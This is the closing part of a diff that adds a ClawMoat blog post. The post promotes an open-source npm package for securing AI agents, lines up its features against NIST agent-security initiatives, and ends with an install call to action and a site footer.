+<tr><td>Agent identity</td><td>NCCoE Concept Paper</td><td>Audit trail per-agent</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Sector-specific (finance)</td><td>Listening Sessions</td><td>FinanceGuard + SOX/PCI reports</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+</tbody>
+</table>
+
+<h2>What This Means</h2>
+
+<p>NIST is doing the right thing. AI agents that can <em>"work autonomously for hours, write and debug code, manage emails and calendars, and shop for goods"</em> (their words) need security standards. The RFI, the NCCoE concept paper, the listening sessions — this is how good policy gets made.</p>
+
+<p>But standards take time. The RFI closes March 9. The concept paper comments close April 2. Guidelines will follow months or years later. Meanwhile, agents are running in production <em>right now</em>, handling real data, making real API calls, accessing real systems.</p>
+
+<p><strong>We're not waiting for the standards. We're shipping them.</strong></p>
+
+<p>ClawMoat is open-source, MIT-licensed, and works with any AI agent framework. Every module described above is in npm today. If NIST's final guidelines recommend something we haven't built yet, we'll build it. If they recommend something better than what we have, we'll adopt it.</p>
+
+<p>But we're not going to leave agents unprotected while the comment period runs.</p>
+
+<div class="cta">
+<h3>Start Securing Your Agents Today</h3>
+<p>Every NIST recommendation above is available as a single npm install.</p>
+<pre><code>npm install clawmoat</code></pre>
+<p style="margin-top:16px">
+<a href="https://github.com/darfaz/clawmoat" style="color:var(--white);background:var(--blue);padding:10px 24px;border-radius:8px;font-weight:600;display:inline-block;margin:4px">⭐ Star on GitHub</a>
+<a href="/scan/" style="color:var(--white);background:var(--emerald);padding:10px 24px;border-radius:8px;font-weight:600;display:inline-block;margin:4px">🔍 Free Security Scan</a>
+</p>
+</div>
+
+<div class="tags">
+<span class="tag">NIST</span>
+<span class="tag">CAISI</span>
+<span class="tag">AI-agent-security</span>
+<span class="tag">standards</span>
+<span class="tag">compliance</span>
+<span class="tag">least-privilege</span>
+</div>
+
+</article>
+</div>
+
+<footer>
+<div class="container">
+  <div style="display:flex;gap:24px;justify-content:center;flex-wrap:wrap;margin-bottom:16px">
+    <a href="https://github.com/darfaz/clawmoat" style="color:var(--gray)">GitHub</a>
+    <a href="https://www.npmjs.com/package/clawmoat" style="color:var(--gray)">npm</a>
+    <a href="/blog/" style="color:var(--gray)">Blog</a>
+    <a href="mailto:hello@clawmoat.com" style="color:var(--gray)">hello@clawmoat.com</a>
+  </div>
+  <p style="text-align:center;color:var(--gray);font-size:.85rem">© 2026 ClawMoat</p>
+</div>
+</footer>
+
+</body>
+</html>